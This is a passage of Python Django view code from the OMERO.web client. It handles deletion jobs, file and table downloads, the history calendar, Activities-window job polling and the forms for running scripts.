            logger.error(traceback.format_exc())
            rdict = {"bad": "true", "errs": str(x)}
            return JsonResponse(rdict)
        rdict = {"bad": "false"}
        return JsonResponse(rdict)
    elif action == "removefromshare":
        # Remove a single image from the current share
        image_id = request.POST.get("source")
        try:
            manager.removeImage(image_id)
        except Exception as x:
            logger.error(traceback.format_exc())
            rdict = {"bad": "true", "errs": str(x)}
            return JsonResponse(rdict)
        rdict = {"bad": "false"}
        return JsonResponse(rdict)
    elif action == "delete":
        # Handles delete of a file attached to object.
        child = toBoolean(request.POST.get("child"))
        anns = toBoolean(request.POST.get("anns"))
        try:
            handle = manager.deleteItem(child, anns)
            # Register the async delete so the Activities window can
            # poll its progress via the session 'callback' map
            request.session["callback"][str(handle)] = {
                "job_type": "delete",
                "delmany": False,
                "did": o_id,
                "dtype": o_type,
                "status": "in progress",
                "error": 0,
                "dreport": _formatReport(handle),
                "start_time": datetime.datetime.now(),
            }
            request.session.modified = True
        except Exception as x:
            logger.error(
                "Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
            )
            rdict = {"bad": "true", "errs": str(x)}
        else:
            rdict = {"bad": "false"}
        return JsonResponse(rdict)
    elif action == "deletemany":
        # Handles multi-delete from jsTree.
        object_ids = {
            "Image": request.POST.getlist("image"),
            "Dataset": request.POST.getlist("dataset"),
            "Project": request.POST.getlist("project"),
            "Annotation": request.POST.getlist("tag"),
            "Screen": request.POST.getlist("screen"),
            "Plate": request.POST.getlist("plate"),
            "Well": request.POST.getlist("well"),
            "PlateAcquisition": request.POST.getlist("acquisition"),
        }
        child = toBoolean(request.POST.get("child"))
        anns = toBoolean(request.POST.get("anns"))
        logger.debug(
            "Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
        )
        try:
            # One async delete job per object type with ids to delete
            for key, ids in object_ids.items():
                if ids is not None and len(ids) > 0:
                    handle = manager.deleteObjects(key, ids, child, anns)
                    if key == "PlateAcquisition":
                        key = "Plate Run"  # for nicer user message
                    dMap = {
                        "job_type": "delete",
                        "start_time": datetime.datetime.now(),
                        "status": "in progress",
                        "error": 0,
                        "dreport": _formatReport(handle),
                        "dtype": key,
                    }
                    if len(ids) > 1:
                        dMap["delmany"] = len(ids)
                        dMap["did"] = ids
                    else:
                        dMap["delmany"] = False
                        dMap["did"] = ids[0]
                    request.session["callback"][str(handle)] = dMap
            request.session.modified = True
        except Exception:
            logger.error(
                "Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
            )
            # Ajax error handling will allow user to submit bug report
            raise
        else:
            rdict = {"bad": "false"}
            return JsonResponse(rdict)
    context["template"] = template
    return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
    """
    Return the specified OriginalFile's contents as an http response,
    streamed in chunks. Used for displaying text or png/jpeg etc files
    in the browser, or (with download=True) as an attachment.
    """
    # May be viewing results of a script run in a different group.
    conn.SERVICE_OPTS.setOmeroGroup(-1)
    source = conn.getObject("OriginalFile", fileId)
    if source is None:
        return handlerInternalError(
            request, "Original File does not exist (id:%s)." % (fileId)
        )
    # The response cleans up the connection once the chunked body is sent
    rsp = ConnCleaningHttpResponse(source.getFileInChunks(buf=settings.CHUNK_SIZE))
    rsp.conn = conn
    content_type = source.mimetype
    if content_type == "text/x-python":
        content_type = "text/plain"  # allows display in browser
    rsp["Content-Type"] = content_type
    rsp["Content-Length"] = source.getSize()
    if download:
        attachment_name = source.name.replace(" ", "_").replace(",", ".")
        rsp["Content-Disposition"] = "attachment; filename=%s" % attachment_name
    return rsp
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
    """
    Download OMERO.table as CSV (streaming response) or return as HTML or json.

    @param file_id:     OriginalFile ID
    @param mtype:       None for html table or 'csv' or 'json'
    @param conn:        BlitzGateway connection

    GET parameters 'query', 'offset' and 'limit' control which rows are
    returned; pagination links are added to the json/html context.
    """
    query = request.GET.get("query", "*")
    offset = get_long_or_default(request, "offset", 0)
    limit = get_long_or_default(request, "limit", settings.PAGE)
    iviewer_url = None
    try:
        iviewer_url = reverse("omero_iviewer_index")
    except NoReverseMatch:
        # OMERO.iviewer app not installed; template omits the links
        pass
    # Check if file exists since _table_query() doesn't check
    file_id = long(file_id)
    orig_file = conn.getObject("OriginalFile", file_id)
    if orig_file is None:
        raise Http404("OriginalFile %s not found" % file_id)
    # 'lazy' requests a row generator instead of materialised rows
    lazy = mtype == "csv"
    context = webgateway_views._table_query(
        request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
    )
    if context.get("error") or not context.get("data"):
        return JsonResponse(context)
    # OR, return as csv or html
    if mtype == "csv":
        table_data = context.get("data")
        def csv_gen():
            # Stream the header line, then batches of rows as csv lines
            csv_cols = ",".join(table_data.get("columns"))
            yield csv_cols
            for rows in table_data.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
                )
        downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
        downloadName = downloadName + ".csv"
        # TableClosingHttpResponse closes the OMERO.table when streaming ends
        rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
        rsp.conn = conn
        rsp.table = context.get("table")
        rsp["Content-Type"] = "application/force-download"
        # rsp['Content-Length'] = ann.getFileSize()
        rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
        return rsp
    context["data"]["name"] = orig_file.name
    context["data"]["path"] = orig_file.path
    context["data"]["id"] = file_id
    context["meta"]["query"] = query
    # check if offset matches an integer page number:
    if offset == 0 or offset / limit == offset // limit:
        context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
    # pagination links
    url = reverse("omero_table", args=[file_id])
    context["meta"]["url"] = url
    url += "?limit=%s" % limit
    if query != "*":
        url += "&query=%s" % query
    if (offset + limit) < context["meta"]["totalCount"]:
        context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
    if offset > 0:
        context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
    # by default, return context as JSON data
    if mtype is None:
        context["template"] = "webclient/annotations/omero_table.html"
        context["iviewer_url"] = iviewer_url
        col_types = context["data"]["column_types"]
        if "ImageColumn" in col_types:
            context["image_column_index"] = col_types.index("ImageColumn")
        if "WellColumn" in col_types:
            context["well_column_index"] = col_types.index("WellColumn")
        if "RoiColumn" in col_types:
            context["roi_column_index"] = col_types.index("RoiColumn")
        # provide example queries - pick first DoubleColumn...
        for idx, c_type in enumerate(col_types):
            if c_type in ("DoubleColumn", "LongColumn"):
                col_name = context["data"]["columns"][idx]
                # find first few non-empty cells...
                vals = []
                for row in context["data"]["rows"]:
                    if row[idx]:
                        vals.append(row[idx])
                    if len(vals) > 3:
                        break
                if " " in col_name or len(vals) < 2:
                    # Don't support queries on columns with spaces
                    continue
                context["example_column"] = col_name
                context["example_min_value"] = min(vals)
                context["example_max_value"] = max(vals)
                break
    return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
    """Return the FileAnnotation's file as an http download response."""
    ann = conn.getObject("FileAnnotation", annId)
    if ann is None:
        return handlerInternalError(
            request, "FileAnnotation does not exist (id:%s)." % (annId)
        )
    # Stream the file in chunks; the response cleans the connection up
    rsp = ConnCleaningHttpResponse(ann.getFileInChunks(buf=settings.CHUNK_SIZE))
    rsp.conn = conn
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = ann.getFileSize()
    attachment_name = ann.getFileName().replace(" ", "_")
    rsp["Content-Disposition"] = "attachment; filename=%s" % attachment_name
    return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
    """Download the image's 'Original Metadata' as a plain-text file."""
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    om = image.loadOriginalMetadata()
    # om[1] holds global key/value pairs, om[2] the series metadata
    lines = ["[Global Metadata]"]
    lines.extend("%s=%s" % (kv[0], kv[1]) for kv in om[1])
    lines.append("[Series Metadata]")
    lines.extend("%s=%s" % (kv[0], kv[1]) for kv in om[2])
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
    """
    Page displays a simple "Preparing download..." message and redirects to
    the 'url'.
    We construct the url and query string from request: 'url' and 'ids'.

    GET parameters: 'ids' (required, e.g. image-1|image-2), optional
    'format' (export format - otherwise original files are downloaded)
    and 'name' (default zip name).
    """
    format = request.GET.get("format", None)
    if format is not None:
        download_url = reverse("download_as")
        zipName = "Export_as_%s" % format
    else:
        download_url = reverse("archived_files")
        zipName = "OriginalFileDownload"
    targetIds = request.GET.get("ids")  # E.g. image-1|image-2
    defaultName = request.GET.get("name", zipName)  # default zip name
    defaultName = os.path.basename(defaultName)  # remove path
    if targetIds is None:
        raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
    ids = targetIds.split("|")
    fileLists = []
    fileCount = 0
    filesTotalSize = 0
    # If we're downloading originals, list original files so user can
    # download individual files.
    if format is None:
        imgIds = []
        # NOTE(review): wellIds is collected but never used below -
        # presumably well handling was intended; confirm against callers
        wellIds = []
        for i in ids:
            if i.split("-")[0] == "image":
                imgIds.append(i.split("-")[1])
            elif i.split("-")[0] == "well":
                wellIds.append(i.split("-")[1])
        images = []
        # Get images...
        if imgIds:
            images = list(conn.getObjects("Image", imgIds))
        if len(images) == 0:
            raise Http404("No images found.")
        # Have a list of files per fileset (or per image without fileset)
        fsIds = set()
        fileIds = set()
        for image in images:
            fs = image.getFileset()
            if fs is not None:
                # Make sure we've not processed this fileset before.
                if fs.id in fsIds:
                    continue
                fsIds.add(fs.id)
            files = list(image.getImportedImageFiles())
            fList = []
            for f in files:
                # De-duplicate files shared between images/filesets
                if f.id in fileIds:
                    continue
                fileIds.add(f.id)
                fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
                filesTotalSize += f.getSize()
            if len(fList) > 0:
                fileLists.append(fList)
        fileCount = sum([len(fList) for fList in fileLists])
    else:
        # E.g. JPEG/PNG - 1 file per image
        fileCount = len(ids)
    # Rebuild the ids as a query string, e.g. image=1&image=2
    query = "&".join([_id.replace("-", "=") for _id in ids])
    download_url = download_url + "?" + query
    if format is not None:
        download_url = download_url + "&format=%s" % format
    context = {
        "template": "webclient/annotations/download_placeholder.html",
        "url": download_url,
        "defaultName": defaultName,
        "fileLists": fileLists,
        "fileCount": fileCount,
        "filesTotalSize": filesTotalSize,
    }
    if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        # Template shows a warning instead of the zip-download link
        context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
    """Render the calendar shown in the left panel of the history page.

    Defaults to the current month when no year/month is given; entries
    are filtered by the experimenter id stored in the session.
    """
    eid = request.session.get("user_id")
    if year is not None and month is not None:
        controller = BaseCalendar(conn=conn, year=year, month=month, eid=eid)
    else:
        today = datetime.datetime.today()
        controller = BaseCalendar(
            conn=conn, year=today.year, month=today.month, eid=eid
        )
    controller.create_calendar()
    return {
        "controller": controller,
        "template": "webclient/history/calendar.html",
    }
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
    """Load the centre-panel data for one date of the history view."""
    if year is None or month is None or day is None:
        raise Http404("Year, month, and day are required")
    page_num = int(request.GET.get("page", 1))
    eid = request.session.get("user_id")
    controller = BaseCalendar(
        conn=conn, year=year, month=month, day=day, eid=eid
    )
    controller.get_items(page_num)
    return {
        "controller": controller,
        "template": "webclient/history/history_details.html",
    }
def getObjectUrl(conn, obj):
    """
    Return a webclient URL for browsing to the given omero.model object
    (P/D/I, S/P, FileAnnotation etc.); used to display results from the
    scripting service.
    E.g. webclient/userdata/?show=image-12601
    For a FileAnnotation we try to browse to a parent P/D/I instead.
    """
    base_url = reverse(viewname="load_template", args=["userdata"])
    # FileAnnotation: switch target to the first linked parent we find
    if isinstance(obj, omero.model.FileAnnotationI):
        fa = conn.getObject("Annotation", obj.id.val)
        for ptype in ["project", "dataset", "image"]:
            links = list(fa.getParentLinks(ptype))
            if len(links) > 0:
                obj = links[0].parent
                break
    browsable = ("ImageI", "DatasetI", "ProjectI", "ScreenI", "PlateI", "WellI")
    kls = obj.__class__.__name__
    if kls in browsable:
        # e.g. "ImageI" -> "image"
        base_url += "?show=%s-%s" % (kls[:-1].lower(), obj.id.val)
    return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
    """Merge key/value pairs into the session's callback entry for cbString."""
    entry = request.session["callback"][cbString]
    entry.update(kwargs)
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
    """
    This refreshes callback handles (delete, scripts, chgrp etc) and provides
    html to update Activities window & Progressbar.
    The returned html contains details for ALL callbacks in web session,
    regardless of their status.
    We also add counts of jobs, failures and 'in progress' to update status
    bar.

    Special cases handled before the main poll loop:
    - GET with ?jobId=... polls a single chgrp/chown dry-run handle and
      returns its status dict directly (not stored in the session).
    - DELETE with a JSON body {'jobId': ...} cancels that job.
    """
    in_progress = 0
    failure = 0
    new_results = []
    # Drop the oldest finished callbacks if the session holds too many.
    _purgeCallback(request)
    # If we have a jobId (not added to request.session) just process it...
    # ONLY used for chgrp/chown dry-run.
    jobId = request.GET.get("jobId", None)
    if jobId is not None:
        jobId = str(jobId)
        try:
            prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
            status = prx.getStatus()
            logger.debug("job status: %s", status)
            rsp = prx.getResponse()
            if rsp is not None:
                rv = graphResponseMarshal(conn, rsp)
                rv["finished"] = True
            else:
                rv = {"finished": False}
            rv["status"] = {
                "currentStep": status.currentStep,
                "steps": status.steps,
                "startTime": status.startTime,
                "stopTime": status.stopTime,
            }
        except IceException:
            # Handle is gone: treat the job as complete.
            rv = {"finished": True}
        return rv
    elif request.method == "DELETE":
        try:
            json_data = json.loads(request.body)
        except TypeError:
            # for Python 3.5
            json_data = json.loads(bytes_to_native_str(request.body))
        jobId = json_data.get("jobId", None)
        if jobId is not None:
            jobId = str(jobId)
            rv = {"jobId": jobId}
            try:
                prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
                status = prx.getStatus()
                logger.debug("pre-cancel() job status: %s", status)
                rv["status"] = {
                    "currentStep": status.currentStep,
                    "steps": status.steps,
                    "startTime": status.startTime,
                    "stopTime": status.stopTime,
                }
                prx.cancel()
            except omero.LockTimeout:
                # expected that it will take > 5 seconds to cancel
                logger.info("Timeout on prx.cancel()")
            return rv
    # test each callback for failure, errors, completion, results etc
    for cbString in request.session.get("callback").keys():
        callbackDict = request.session["callback"][cbString]
        job_type = callbackDict["job_type"]
        status = callbackDict["status"]
        if status == "failed":
            failure += 1
        request.session.modified = True
        # update chgrp / chown
        if job_type in ("chgrp", "chown"):
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    rsp = prx.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error(
                                    "%s failed with: %s" % (job_type, rsp_params)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report="%s %s" % (rsp.name, rsp_params),
                                    error=1,
                                )
                            elif isinstance(rsp, omero.cmd.OK):
                                update_callback(request, cbString, status="finished")
                        else:
                            in_progress += 1
                    finally:
                        # close_handle=True also closes the server-side handle
                        prx.close(close_handle)
                except Exception:
                    logger.info(
                        "Activities %s handle not found: %s" % (job_type, cbString)
                    )
                    continue
        elif job_type == "send_email":
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    callback = omero.callbacks.CmdCallbackI(
                        conn.c, prx, foreground_poll=True
                    )
                    rsp = callback.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error("send_email failed with: %s" % rsp_params)
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report={"error": rsp_params},
                                    error=1,
                                )
                            else:
                                # Success: record counts of delivered vs invalid
                                # recipients for display.
                                total = (
                                    rsp.success
                                    + len(rsp.invalidusers)
                                    + len(rsp.invalidemails)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="finished",
                                    rsp={"success": rsp.success, "total": total},
                                )
                                if (
                                    len(rsp.invalidusers) > 0
                                    or len(rsp.invalidemails) > 0
                                ):
                                    invalidusers = [
                                        e.getFullName()
                                        for e in list(
                                            conn.getObjects(
                                                "Experimenter", rsp.invalidusers
                                            )
                                        )
                                    ]
                                    update_callback(
                                        request,
                                        cbString,
                                        report={
                                            "invalidusers": invalidusers,
                                            "invalidemails": rsp.invalidemails,
                                        },
                                    )
                        else:
                            in_progress += 1
                    finally:
                        callback.close(close_handle)
                except Exception:
                    logger.error(traceback.format_exc())
                    logger.info("Activities send_email handle not found: %s" % cbString)
        # update delete
        elif job_type == "delete":
            if status not in ("failed", "finished"):
                try:
                    handle = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    cb = omero.callbacks.CmdCallbackI(
                        conn.c, handle, foreground_poll=True
                    )
                    rsp = cb.getResponse()
                    close_handle = False
                    try:
                        if not rsp: # Response not available
                            update_callback(
                                request,
                                cbString,
                                error=0,
                                status="in progress",
                                dreport=_formatReport(handle),
                            )
                            in_progress += 1
                        else: # Response available
                            close_handle = True
                            new_results.append(cbString)
                            rsp = cb.getResponse()
                            err = isinstance(rsp, omero.cmd.ERR)
                            if err:
                                update_callback(
                                    request,
                                    cbString,
                                    error=1,
                                    status="failed",
                                    dreport=_formatReport(handle),
                                )
                                failure += 1
                            else:
                                update_callback(
                                    request,
                                    cbString,
                                    error=0,
                                    status="finished",
                                    dreport=_formatReport(handle),
                                )
                    finally:
                        cb.close(close_handle)
                except Ice.ObjectNotExistException:
                    # Handle already gone: assume the delete completed.
                    update_callback(
                        request, cbString, error=0, status="finished", dreport=None
                    )
                except Exception as x:
                    logger.error(traceback.format_exc())
                    logger.error("Status job '%s'error:" % cbString)
                    update_callback(
                        request, cbString, error=1, status="failed", dreport=str(x)
                    )
                    failure += 1
        # update scripts
        elif job_type == "script":
            # if error on runScript, the cbString is not a ProcessCallback...
            if not cbString.startswith("ProcessCallback"):
                continue # ignore
            if status not in ("failed", "finished"):
                logger.info("Check callback on script: %s" % cbString)
                try:
                    proc = omero.grid.ScriptProcessPrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                except IceException:
                    update_callback(
                        request,
                        cbString,
                        status="failed",
                        Message="No process found for job",
                        error=1,
                    )
                    continue
                cb = omero.scripts.ProcessCallbackI(conn.c, proc)
                # check if we get something back from the handle...
                if cb.block(0): # ms.
                    cb.close()
                    try:
                        # we can only retrieve this ONCE - must save results
                        results = proc.getResults(0, conn.SERVICE_OPTS)
                        update_callback(request, cbString, status="finished")
                        new_results.append(cbString)
                    except Exception:
                        update_callback(
                            request,
                            cbString,
                            status="finished",
                            Message="Failed to get results",
                        )
                        logger.info("Failed on proc.getResults() for OMERO.script")
                        continue
                    # value could be rstring, rlong, robject
                    rMap = {}
                    for key, value in results.items():
                        v = value.getValue()
                        if key in ("stdout", "stderr", "Message"):
                            if key in ("stderr", "stdout"):
                                # just save the id of original file
                                v = v.id.val
                            update_kwargs = {key: v}
                            update_callback(request, cbString, **update_kwargs)
                        else:
                            if hasattr(v, "id"):
                                # do we have an object (ImageI,
                                # FileAnnotationI etc)
                                obj_data = {
                                    "id": v.id.val,
                                    "type": v.__class__.__name__[:-1],
                                }
                                obj_data["browse_url"] = getObjectUrl(conn, v)
                                if v.isLoaded() and hasattr(v, "file"):
                                    # try:
                                    mimetypes = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if v.file.mimetype.val in mimetypes:
                                        obj_data["fileType"] = mimetypes[
                                            v.file.mimetype.val
                                        ]
                                        obj_data["fileId"] = v.file.id.val
                                    obj_data["name"] = v.file.name.val
                                    # except Exception:
                                    # pass
                                if v.isLoaded() and hasattr(v, "name"):
                                    # E.g Image, OriginalFile etc
                                    name = unwrap(v.name)
                                    if name is not None:
                                        # E.g. FileAnnotation has null name
                                        obj_data["name"] = name
                                rMap[key] = obj_data
                            else:
                                rMap[key] = unwrap(v)
                    update_callback(request, cbString, results=rMap)
                else:
                    in_progress += 1
    # having updated the request.session, we can now prepare the data for http
    # response
    rv = {}
    for cbString in request.session.get("callback").keys():
        # make a copy of the map in session, so that we can replace non
        # json-compatible objects, without modifying session
        rv[cbString] = copy.copy(request.session["callback"][cbString])
    # return json (used for testing)
    if "template" in kwargs and kwargs["template"] == "json":
        for cbString in request.session.get("callback").keys():
            rv[cbString]["start_time"] = str(
                request.session["callback"][cbString]["start_time"]
            )
        rv["inprogress"] = in_progress
        rv["failure"] = failure
        rv["jobs"] = len(request.session["callback"])
        return JsonResponse(rv) # json
    jobs = []
    new_errors = False
    for key, data in rv.items():
        # E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
        # create id we can use as html id,
        # E.g. 39f77932-c447-40d8-8f99-910b5a531a25
        if len(key.split(" ")) > 0:
            htmlId = key.split(" ")[0]
            if len(htmlId.split("/")) > 1:
                htmlId = htmlId.split("/")[1]
        rv[key]["id"] = htmlId
        rv[key]["key"] = key
        if key in new_results:
            rv[key]["new"] = True
        if "error" in data and data["error"] > 0:
            new_errors = True
        jobs.append(rv[key])
    jobs.sort(key=lambda x: x["start_time"], reverse=True)
    context = {
        "sizeOfJobs": len(request.session["callback"]),
        "jobs": jobs,
        "inprogress": in_progress,
        "new_results": len(new_results),
        "new_errors": new_errors,
        "failure": failure,
    }
    context["template"] = "webclient/activities/activitiesContent.html"
    return context
@login_required()
def activities_update(request, action, **kwargs):
    """
    Handle updates to the Activities window.
    When 'action' is 'clean', remove jobs from request.session['callback']:
    a single job if 'jobKey' is given in the POST data, otherwise every job
    that is not still in progress.
    """
    request.session.modified = True
    if action == "clean":
        callbacks = request.session["callback"]
        if "jobKey" in request.POST:
            job_id = request.POST.get("jobKey")
            removed = job_id in callbacks
            if removed:
                del callbacks[job_id]
                request.session.modified = True
            return JsonResponse({"removed": removed})
        # No specific job: drop everything that has finished or failed.
        for key, data in list(callbacks.items()):
            if data["status"] != "in progress":
                del callbacks[key]
    return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
    """Return the experimenter's photo as a JPEG response."""
    photo_data = conn.getExperimenterPhoto(oid)
    return HttpResponse(photo_data, content_type="image/jpeg")
##############################################################################
# webgateway extension
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
    """
    Delegates to the webgateway full viewer, using the share connection
    when a share_id is given.
    """
    # Use an explicit conditional expression rather than the error-prone
    # 'cond and a or b' idiom the original used.
    base = reverse("webindex")
    viewport_server = base + share_id if share_id is not None else base
    # remove any trailing slash
    kwargs["viewport_server"] = viewport_server.rstrip("/")
    return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
    """
    List the available scripts - just official scripts for now.
    Scripts listed in the 'scripts_to_ignore' server setting are skipped.
    If all scripts are under a single top-level directory, this is
    removed by default. To prevent this, use ?full_path=true
    """
    scriptService = conn.getScriptService()
    scripts = scriptService.getScripts()
    # group scripts into 'folders' (path), named by parent folder name
    scriptMenu = {}
    scripts_to_ignore = (
        request.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in scripts:
        scriptId = s.id.val
        path = s.path.val
        name = s.name.val
        fullpath = os.path.join(path, name)
        if fullpath in scripts_to_ignore:
            logger.info("Ignoring script %r" % fullpath)
            continue
        # We want to build a hierarchical <ul> <li> structure
        # Each <ul> is a {}, each <li> is either a script 'name': <id> or
        # directory 'name': {ul}
        # NOTE: values in these nested dicts are overloaded - an int means a
        # script id (leaf), a dict means a sub-directory.
        ul = scriptMenu
        dirs = fullpath.split(os.path.sep)
        for li, d in enumerate(dirs):
            if len(d) == 0:
                continue
            if d not in ul:
                # if last component in path:
                if li + 1 == len(dirs):
                    ul[d] = scriptId
                else:
                    ul[d] = {}
            ul = ul[d]

    # convert <ul> maps into lists and sort
    def ul_to_list(ul):
        # Recursively convert a nested menu dict into a sorted list of
        # {'name': ..., 'id': ...} / {'name': ..., 'ul': [...]} entries.
        dir_list = []
        for name, value in ul.items():
            if isinstance(value, dict):
                # value is a directory
                dir_list.append({"name": name, "ul": ul_to_list(value)})
            else:
                dir_list.append({"name": name, "id": value})
        dir_list.sort(key=lambda x: x["name"].lower())
        return dir_list

    scriptList = ul_to_list(scriptMenu)
    # If we have a single top-level directory, we can skip it
    if not request.GET.get("full_path") and len(scriptList) == 1:
        scriptList = scriptList[0]["ul"]
    return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
    """
    Generates an html form for the parameters of a defined script.

    Builds a 'paramData' dict (name, description, authors etc.) and a
    sorted list of the script's input parameters, using matching values
    in the request GET to pre-populate defaults where available.
    """
    scriptService = conn.getScriptService()
    try:
        params = scriptService.getParams(long(scriptId))
    except Exception as ex:
        # Bug fix: Python 3 exceptions have no '.message' attribute, so the
        # original 'ex.message' raised AttributeError for non-omero errors.
        # omero.ServerError does define a 'message' field - use it if present.
        message = getattr(ex, "message", None) or str(ex)
        if message.lower().startswith("no processor available"):
            return {
                "template": "webclient/scripts/no_processor.html",
                "scriptId": scriptId,
            }
        # Re-raise preserving the original traceback (instead of 'raise ex').
        raise
    if params is None:
        return HttpResponse()
    paramData = {}
    paramData["id"] = long(scriptId)
    paramData["name"] = params.name.replace("_", " ")
    paramData["description"] = params.description
    paramData["authors"] = ", ".join([a for a in params.authors])
    paramData["contact"] = params.contact
    paramData["version"] = params.version
    paramData["institutions"] = ", ".join([i for i in params.institutions])
    inputs = []  # use a list so we can sort by 'grouping'
    Data_TypeParam = None
    IDsParam = None
    for key, param in params.inputs.items():
        i = {}
        i["name"] = key.replace("_", " ")
        i["key"] = key
        if not param.optional:
            i["required"] = True
        i["description"] = param.description
        if param.min:
            i["min"] = str(param.min.getValue())
        if param.max:
            i["max"] = str(param.max.getValue())
        if param.values:
            i["options"] = [v.getValue() for v in param.values.getValue()]
        if param.useDefault:
            i["default"] = unwrap(param.prototype)
            if isinstance(i["default"], omero.model.IObject):
                i["default"] = None
        pt = unwrap(param.prototype)
        if pt.__class__.__name__ == "dict":
            i["map"] = True
        elif pt.__class__.__name__ == "list":
            i["list"] = True
            if "default" in i:
                i["default"] = ",".join([str(d) for d in i["default"]])
        elif isinstance(pt, bool):
            i["boolean"] = True
        elif isinstance(pt, int) or isinstance(pt, long):
            # will stop the user entering anything other than numbers.
            i["number"] = "number"
        elif isinstance(pt, float):
            i["number"] = "float"
        # if we got a value for this key in the page request, use this as
        # default
        if request.GET.get(key, None) is not None:
            i["default"] = request.GET.get(key, None)
        # E.g "" (string) or [0] (int list) or 0.0 (float)
        i["prototype"] = unwrap(param.prototype)
        i["grouping"] = param.grouping
        inputs.append(i)
        if key == "IDs":
            IDsParam = i  # remember these...
        if key == "Data_Type":
            Data_TypeParam = i
    inputs.sort(key=lambda i: i["grouping"])
    # if we have Data_Type param - use the request parameters to populate IDs
    if (
        Data_TypeParam is not None
        and IDsParam is not None
        and "options" in Data_TypeParam
    ):
        IDsParam["default"] = ""
        for dtype in Data_TypeParam["options"]:
            if request.GET.get(dtype, None) is not None:
                Data_TypeParam["default"] = dtype
                IDsParam["default"] = request.GET.get(dtype, "")
                break  # only use the first match
        # if we've not found a match, check whether we have "Well" selected
        if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
            if "Image" in Data_TypeParam["options"]:
                wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
                wellIdx = 0
                try:
                    wellIdx = int(request.GET.get("Index", 0))
                except Exception:
                    pass
                wells = conn.getObjects("Well", wellIds)
                imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
                Data_TypeParam["default"] = "Image"
                IDsParam["default"] = ",".join(imgIds)
    # try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
    # level now (not recursive!)
    for i in range(len(inputs)):
        if len(inputs) <= i:
            # we may remove items from inputs as we go - need to check
            break
        param = inputs[i]
        grouping = param["grouping"]  # E.g 03
        param["children"] = list()
        while len(inputs) > i + 1:
            nextGrp = inputs[i + 1]["grouping"]  # E.g. 03.1
            if nextGrp.split(".")[0] == grouping:
                param["children"].append(inputs[i + 1])
                inputs.pop(i + 1)
            else:
                break
    paramData["inputs"] = inputs
    return {
        "template": "webclient/scripts/script_ui.html",
        "paramData": paramData,
        "scriptId": scriptId,
    }
